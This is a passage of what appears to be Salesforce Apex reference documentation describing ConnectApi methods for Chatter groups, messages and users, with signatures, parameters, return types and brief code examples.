28.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroup updateGroup(String communityId, String groupId,
ConnectApi.ChatterGroupInput groupInput)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
groupInput
Type: ConnectApi.ChatterGroupInput
A ConnectApi.ChatterGroupInput object.
Return Value
Type: ConnectApi.ChatterGroup
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission. Use this
method to update any settings in the ConnectApi.ChatterGroupInput class. These settings include the group title and text
in the Information section, whether the group is public or private, and whether the group is archived.
839
Reference
ChatterGroups Class
Example
This example archives a group:
String groupId = '0F9D00000000qSz';
String communityId = null;
ConnectApi.ChatterGroupInput groupInput = new ConnectApi.ChatterGroupInput();
groupInput.isArchived = true;
ConnectApi.ChatterGroups.updateGroup(communityId, groupId, groupInput);
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterGroup updateGroupMember(String communityId, String
membershipId, ConnectApi.GroupMembershipType role)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
membershipId
Type: String
The ID for a membership.
role
Type: ConnectApi.GroupMembershipType
The group membership type. One of these values:
GroupManager
StandardMember
Return Value
Type: ConnectApi.ChatterGroup
840
Reference
ChatterGroups Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.GroupChatterSettings updateMyChatterSettings(String communityId,
String groupId, ConnectApi.GroupEmailFrequency emailFrequency)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
groupId
Type: String
The ID for a group.
emailFrequency
Type: ConnectApi.GroupEmailFrequency
emailFrequencySpecifies the frequency with which a user receives email from a group.
EachPost
DailyDigest
WeeklyDigest
Never
UseDefault
The value UseDefault uses the value set in a call to updateChatterSettings(String, String, ConnectApi.GroupEmailFrequency).
Return Value
Type: ConnectApi.GroupChatterSettings
API Version
28.0
841
Reference
ChatterGroups Class
Requires Chatter
Yes
Signature
public static ConnectApi.GroupMembershipRequest updateRequestStatus(String communityId,
String requestId, ConnectApi.GroupMembershipRequestStatus status)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
requestId
Type: String
The ID for a request to join a private group.
status
Type: ConnectApi.GroupMembershipRequestStatus
The status of the request:
Accepted
Declined
The Pending value of the enum is not valid in this method.
Return Value
Type: ConnectApi.GroupMembershipRequest
Usage
This method is only successful when the context user is the group manager or owner, or has Modify All Data permission.
842
Reference
ChatterGroups Class
For information about using these methods to test your ConnectApi code, see Testing ConnectApi Code.
API Version
29.0
Signature
public static Void setTestSearchGroups(String communityId, String q,
ConnectApi.ChatterGroupPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
Can be specified as null.
result
Type: ConnectApi.ChatterGroupPage
The test ConnectApi.ChatterGroupPage object.
Return Value
Type: Void
SEE ALSO:
searchGroups(String, String)
Testing ConnectApi Code
API Version
28.0
843
Reference
ChatterGroups Class
Signature
public static Void setTestSearchGroups(String communityId, String q, Integer pageParam,
Integer pageSize, ConnectApi.ChatterGroupPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
Can be specified as null.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
result
Type: ConnectApi.ChatterGroupPage
The test ConnectApi.ChatterGroupPage object.
Return Value
Type: Void
SEE ALSO:
searchGroups(String, String, Integer, Integer)
Testing ConnectApi Code
API Version
29.0
844
Reference
ChatterMessages Class
Signature
public static Void setTestSearchGroups(String communityId, String q,
ConnectApi.GroupArchiveStatus, archiveStatus, Integer pageParam, Integer pageSize,
ConnectApi.ChatterGroupPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
q
Type: String
qSpecifies the string to search. The search string must contain at least two characters, not including wildcards. See Wildcards.
Can be specified as null.
archiveStatus
Type: ConnectApi.GroupArchiveStatus
archiveStatusSpecifies a set of groups based on whether the groups are archived or not.
AllAll groups, including groups that are archived and groups that are not archived.
ArchivedOnly groups that are archived.
NotArchivedOnly groups that are not archived.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
result
Type: ConnectApi.ChatterGroupPage
The test ConnectApi.ChatterGroupPage object.
Return Value
Type: Void
SEE ALSO:
searchGroups(String, String, ConnectApi.GroupArchiveStatus, Integer, Integer)
Testing ConnectApi Code
ChatterMessages Class
Access and modify message and conversation data.
845
Reference
ChatterMessages Class
Namespace
ConnectApi
Usage
Use Chatter in Apex to get, send, search, and reply to messages. You can also get and search conversations, mark conversations as read,
and get a count of unread messages.
ChatterMessages Methods
The following are methods for ChatterMessages. All methods are static.
IN THIS SECTION:
getConversation(String)
Returns a conversation the context user has access to.
getConversation(String, String, Integer)
Returns a conversation the context user has access to.
getConversation(String, String)
Returns a conversation the context user has access to across their available communities.
getConversation(String, String, String, Integer)
Returns a conversation from a specific page with a specific number of results the context user has access to across their available
communities.
getConversations()
Returns the most recent conversations the context user has access to.
getConversations(String, Integer)
Returns a specific page of conversations the context user has access to.
getConversations(String)
Returns the most recent conversations the context user has access to across their available communities.
getConversations(String, String, Integer)
Returns a specific page of conversations with a specific number of results the context user has access to across their available
communities.
getMessage(String)
Returns a message the context user has access to.
getMessage(String, String)
Returns a message the context user has access to across their available communities.
getMessages()
Returns a list of the most recent messages the context user has access to.
getMessages(String, Integer)
Returns the specified page of messages the context user has access to.
getMessages(String)
Returns a list of the most recent messages the context user has access to across their available communities.
846
Reference
ChatterMessages Class
847
Reference
ChatterMessages Class
getConversation(String)
Returns a conversation the context user has access to.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversation getConversation(String conversationId)
Parameters
conversationId
Type: String
Specify the ID for the conversation.
Return Value
Type: ConnectApi.ChatterConversation
API Version
29.0
848
Reference
ChatterMessages Class
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversation getConversation(String conversationId,
String pageParam, Integer pageSize)
Parameters
conversationId
Type: String
Specify the ID for the conversation.
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterConversation
getConversation(String, String)
Returns a conversation the context user has access to across their available communities.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversation getConversation(String communityId, String
conversationId)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
849
Reference
ChatterMessages Class
conversationId
Type: String
Specify the ID for the conversation.
Return Value
Type: ConnectApi.ChatterConversation
A Chatter conversation and the related metadata.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversation getConversation(String communityId, String
conversationId, String pageParam, String pageSize)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
conversationId
Type: String
Specify the ID for the conversation.
pageParam
Type:String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterConversation
850
Reference
ChatterMessages Class
getConversations()
Returns the most recent conversations the context user has access to.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationPage getConversations()
Return Value
Type: ConnectApi.ChatterConversationPage
getConversations(String, Integer)
Returns a specific page of conversations the context user has access to.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationPage getConversations(String pageParam,
Integer pageSize)
Parameters
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
851
Reference
ChatterMessages Class
Return Value
Type: ConnectApi.ChatterConversationPage
getConversations(String)
Returns the most recent conversations the context user has access to across their available communities.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationPage getConversations(String communityId)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.ChatterConversationPage
A list of Chatter conversations on a specific page.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationPage getConversations(String communityId,
String pageParam, Integer pageSize)
852
Reference
ChatterMessages Class
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
pageParam
Type:String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterConversationPage
A list of Chatter conversations on a specific page.
getMessage(String)
Returns a message the context user has access to.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessage getMessage(String messageId)
Parameters
messageId
Type: String
Specify the ID for the message.
Return Value
Type: ConnectApi.ChatterMessage
getMessage(String, String)
Returns a message the context user has access to across their available communities.
853
Reference
ChatterMessages Class
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessage getMessage(String communityId, String messageId)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
messageId
Type: String
Specify the ID for the message.
Return Value
Type:ConnectApi.ChatterMessage
A Chatter message and all the related metadata.
getMessages()
Returns a list of the most recent messages the context user has access to.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessagePage getMessages()
Return Value
Type: ConnectApi.ChatterMessagePage
getMessages(String, Integer)
Returns the specified page of messages the context user has access to.
854
Reference
ChatterMessages Class
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessagePage getMessages(String pageParam, Integer
pageSize)
Parameters
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterMessagePage
getMessages(String)
Returns a list of the most recent messages the context user has access to across their available communities.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessagePage getMessages(String communityId)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
855
Reference
ChatterMessages Class
Return Value
Type: ConnectApi.ChatterMessagePage
The Chatter messages on a specific page.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessagePage getMessages(String communityId, String
pageParam, Integer pageSize)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterMessagePage
The Chatter messages on a specific page.
getUnreadCount()
Returns the number of conversations the context user has marked unread. If the number is less than 50, it will return the exact unreadCount,
and hasMore = false. If the context user has more than 50, unreadCount = 50 and hasMore = true.
API Version
29.0
856
Reference
ChatterMessages Class
Requires Chatter
Yes
Signature
public static ConnectApi.UnreadConversationCount getUnreadCount()
Return Value
Type: ConnectApi.UnreadConversationCount
getUnreadCount(String)
Returns the number of conversations the context user has marked unread across their available communities. If the number is less than
50, it will return the exact unreadCount, and hasMore = false. If the context user has more than 50, unreadCount = 50 and hasMore =
true.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.UnreadConversationCount getUnreadCount(String communityId)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
Return Value
Type: ConnectApi.UnreadConversationCount
The number of unread messages in a conversation.
markConversationRead(String, Boolean)
Marks a conversation as read for the context user.
API Version
29.0
857
Reference
ChatterMessages Class
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationSummary markConversationRead(String
conversationId, Boolean read)
Parameters
conversationId
Type: String
Specify the ID for the conversation.
read
Type: Boolean
Specifies whether the conversation has been read (true) or not (false).
Return Value
Type: ConnectApi.ChatterConversationSummary
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationSummary markConversationRead(String
communityId, String conversationID, Boolean read)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
conversationId
Type: String
Specify the ID for the conversation.
read
Type: Boolean
858
Reference
ChatterMessages Class
Specifies whether the conversation has been read (true) or not (false).
Return Value
Type: ConnectApi.ChatterConversationSummary
The summary of a Chatter conversation, including the members of the conversation, Chatter REST API URL, and contents of the latest
message.
replyToMessage(String, String)
Adds the specified text as a response to a previous message the context user has access to.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessage replyToMessage(String text, String inReplyTo)
Parameters
text
Type: String
The text of the message. Cannot be empty or over 10,000 characters.
inReplyTo
Type: String
Specify the ID of the message that is being responded to.
Return Value
Type: ConnectApi.ChatterMessage
API Version
30.0
Requires Chatter
Yes
859
Reference
ChatterMessages Class
Signature
public static ConnectApi.ChatterMessage replyToMessage(String communityId, String text,
String inReplyTo)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
text
Type: String
The text of the message. Cannot be empty or over 10,000 characters.
inReplyTo
Type: String
Specify the ID of the message that is being responded to.
Return Value
Type: ConnectApi.ChatterMessage
A Chatter message and all the related metadata.
searchConversation(String, String)
Returns the conversation the context user has access to with a page of messages that matches any of the specified search.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversation searchConversation(String conversationId,
String q)
Parameters
conversationId
Type: String
Specify the ID for the conversation.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
860
Reference
ChatterMessages Class
Return Value
Type: ConnectApi.ChatterConversation
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversation searchConversation(String conversationId,
String pageParam, Integer pageSize, String q)
Parameters
conversationId
Type: String
Specify the ID for the conversation.
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
q
Type: String
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterConversation
API Version
30.0
861
Reference
ChatterMessages Class
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversation searchConversation(String communityId,
String conversationId, String q)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
conversationId
Type: String
Specify the ID for the conversation.
q
Type: String
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterConversation
A Chatter conversation and the related metadata.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversation searchConversation(String communityId,
String conversationId, String pageParam, Integer pageSize, String q)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
862
Reference
ChatterMessages Class
conversationId
Type: String
Specify the ID for the conversation.
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
q
Type: String
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.ChatterConversation
A Chatter conversation and the related metadata.
searchConversations(String)
Returns a page of conversations the context user has access to where member names and messages in the conversations match any of
the specified search criteria.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationPage searchConversations(String q)
Parameters
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.ChatterConversationPage
863
Reference
ChatterMessages Class
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationPage searchConversations(String pageParam,
Integer pageSize, String q)
Parameters
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.ChatterConversationPage
searchConversations(String, String)
Returns a page of conversations the context user has access to where member names and messages in the conversations match any of
the specified search criteria across their available communities.
API Version
30.0
Requires Chatter
Yes
864
Reference
ChatterMessages Class
Signature
public static ConnectApi.ChatterConversationPage searchConversations(String communityId,
String q)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.ChatterConversationPage
A list of Chatter conversations on a specific page.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterConversationPage searchConversations(String communityId,
String pageParam, Integer pageSize, String q)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
865
Reference
ChatterMessages Class
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.ChatterConversationPage
A list of Chatter conversations on a specific page.
searchMessages(String)
Returns a page of messages the context user has access to that matches any of the specified criteria.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessagePage searchMessages(String q)
Parameters
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.ChatterMessagePage
API Version
29.0
866
Reference
ChatterMessages Class
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessagePage searchMessages(String pageParam, Integer
pageSize, String q)
Parameters
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.ChatterMessagePage
searchMessages(String, String)
Returns a page of messages the context user has access to that matches any of the specified criteria across their available communities.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessagePage searchMessages(String communityId, String
q)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
867
Reference
ChatterMessages Class
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
Return Value
Type: ConnectApi.ChatterMessagePage
The Chatter messages on a specific page.
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessagePage searchMessages(String communityId, String
pageParam, Integer pageSize, String q)
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
pageParam
Type: String
Specifies the page token to be used to view a page of information. Page tokens are returned as part of the response class, such as
currentPageToken or nextPageToken. If you pass in null, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
q
Type: String
Required and cannot be null. Specifies the string to search. The search string must contain at least two characters, not including
wildcards. See Wildcards.
868
Reference
ChatterMessages Class
Return Value
Type: ConnectApi.ChatterMessagePage
The Chatter messages on a specific page.
sendMessage(String, String)
Sends the specified text to the indicated recipients.
API Version
29.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessage sendMessage(String text, String recipients)
Parameters
text
Type: String
The text of the message. Cannot be empty or over 10,000 characters.
recipients
Type: String
Up to nine comma-separated IDs of the users receiving the message.
Return Value
Type: ConnectApi.ChatterMessage
API Version
30.0
Requires Chatter
Yes
Signature
public static ConnectApi.ChatterMessage sendMessage(String communityId, String text,
String recipients)
869
Reference
ChatterUsers Class
Parameters
communityId
Type:String
Use either the ID for a community, internal, or null.
text
Type: String
The text of the message. Cannot be empty or over 10,000 characters.
recipients
Type: String
Up to nine comma-separated IDs of users to receive the message.
Return Value
Type: ConnectApi.ChatterMessage
A Chatter message and all the related metadata.
ChatterUsers Class
Access information about users, such as followers, subscriptions, files, and groups.
Namespace
ConnectApi
ChatterUsers Methods
The following are methods for ChatterUsers. All methods are static.
IN THIS SECTION:
deletePhoto(String, String)
Deletes the specified users photo.
follow(String, String, String)
Adds the specified userId as a follower to the specified subjectId.
getChatterSettings(String, String)
Returns information about the default Chatter settings for the specified user.
getFollowers(String, String)
Returns the first page of followers for the specified user ID. The page contains the default number of items.
getFollowers(String, String, Integer, Integer)
Returns the specified page of followers for the specified user ID.
getFollowings(String, String)
Returns the first page of information about the followers of the specified user. The page contains the default number of items. This
is different than getFollowers, which returns the users that follow the specified user.
870
Reference
ChatterUsers Class
871
Reference
ChatterUsers Class
deletePhoto(String, String)
Deletes the specified users photo.
API Version
28.0
Requires Chatter
Yes
Signature
public static Void deletePhoto(String communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
Return Value
Type: Void
872
Reference
ChatterUsers Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Subscription follow(String communityId, String userId, String
subjectId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
subjectId
Type: String
The ID for the subject to follow.
Return Value
Type: ConnectApi.Subscription
SEE ALSO:
Follow a Record
Unfollow a Record
getChatterSettings(String, String)
Returns information about the default Chatter settings for the specified user.
API Version
28.0
Requires Chatter
Yes
873
Reference
ChatterUsers Class
Signature
public static ConnectApi.UserChatterSettings getChatterSettings(String communityId,
String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for the context user or the keyword me.
Return Value
Type: ConnectApi.UserChatterSettings
getFollowers(String, String)
Returns the first page of followers for the specified user ID. The page contains the default number of items.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowerPage getFollowers(String communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
874
Reference
ChatterUsers Class
Return Value
Type: ConnectApi.FollowerPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowerPage getFollowers(String communityId, String userId,
Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.FollowerPage
getFollowings(String, String)
Returns the first page of information about the followers of the specified user. The page contains the default number of items. This is
different than getFollowers, which returns the users that follow the specified user.
875
Reference
ChatterUsers Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowingPage getFollowings(String communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
Return Value
Type: ConnectApi.FollowingPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowingPage getFollowings(String communityId, String userId,
Integer pageParam)
876
Reference
ChatterUsers Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
Return Value
Type: ConnectApi.FollowingPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowingPage getFollowings(String communityId, String userId,
Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
pageParam
Type: Integer
877
Reference
ChatterUsers Class
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.FollowingPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowingPage getFollowings(String communityId, String userId,
String filterType)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
filterType
Type: String
Specifies the key prefix to filter the type of objects returned. A key prefix is the first three characters of the object ID, which specifies
the object type. For example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
Return Value
Type: ConnectApi.FollowingPage
878
Reference
ChatterUsers Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowingPage getFollowings(String communityId, String userId,
String filterType, Integer pageParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
filterType
Type: String
Specifies the key prefix to filter the type of objects returned. A key prefix is the first three characters of the object ID, which specifies
the object type. For example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
Return Value
Type: ConnectApi.FollowingPage
879
Reference
ChatterUsers Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowingPage getFollowings(String communityId, String userId,
String filterType, Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
filterType
Type: String
Specifies the key prefix to filter the type of objects returned. A key prefix is the first three characters of the object ID, which specifies
the object type. For example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.FollowingPage
getGroups(String, String)
Returns the first page of groups the specified user is a member of.
API Version
28.0
880
Reference
ChatterUsers Class
Requires Chatter
Yes
Signature
public static ConnectApi.UserGroupPage getGroups(String communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
Return Value
Type: ConnectApi.UserGroupPage
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.UserGroupPage getGroups(String communityId, String userId,
Integer pageParam, Integer pageSize)
Parameters
communityId
Type: String
881
Reference
ChatterUsers Class
Type: String
The ID for a user.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.UserGroupPage
getPhoto(String, String)
Returns information about the specified users photo.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Photo getPhoto(String communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
Return Value
Type: ConnectApi.Photo
882
Reference
ChatterUsers Class
getReputation(String, String)
Returns the reputation of the specified user.
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.Reputation getReputation(String communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
ID of the user.
Return Value
Type: ConnectApi.Reputation
getUser(String, String)
Returns information about the specified user.
API Version
28.0
Requires Chatter
Yes
883
Reference
ChatterUsers Class
Signature
public static ConnectApi.UserSummary getUser(String communityId, String userId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
userId
Type: String
The ID for a user.
Return Value
Type: ConnectApi.UserSummary
Usage
If the context user is not a Chattercustomer, the returned object can be downcast to a UserDetail object.
getUserBatch(String, List<String>)
Gets information about the specified list of users. Returns a list of BatchResult objects containing ConnectApi.User objects.
Returns errors embedded in the results for those users that couldnt be loaded.
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.BatchResult[] getUserBatch(String communityId, List<String>
userIds)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
884
Reference
ChatterUsers Class
userIds
Type: List<String>
A list of up to 500 user IDs.
Return Value
Type: BatchResult[]
The BatchResult getResults() method returns a ConnectApi.User object.
Example
// Get users in an organization.
ConnectApi.UserPage userPage = ConnectApi.ChatterUsers.getUsers(null);
// Create a list of user IDs.
List<String> userList = new List<String>();
for (ConnectApi.User user : userPage.users){
userList.add(user.id);
}
// Get info about all users in the list.
ConnectApi.BatchResult[] batchResults = ConnectApi.ChatterUsers.getUserBatch(null, userList);
for (ConnectApi.BatchResult batchResult : batchResults) {
if (batchResult.isSuccess()) {
// Operation was successful.
// Print each user's username.
ConnectApi.UserDetail user;
if(batchResult.getResult() instanceof ConnectApi.UserDetail) {
user = (ConnectApi.UserDetail) batchResult.getResult();
}
System.debug('SUCCESS');
System.debug(user.username);
}
else {
// Operation failed. Print errors.
System.debug('FAILURE');
System.debug(batchResult.getErrorMessage());
}
}
getUsers(String)
Returns the first page of users. The page contains the default number of items.
API Version
28.0
885
Reference
ChatterUsers Class
Requires Chatter
Yes
Signature
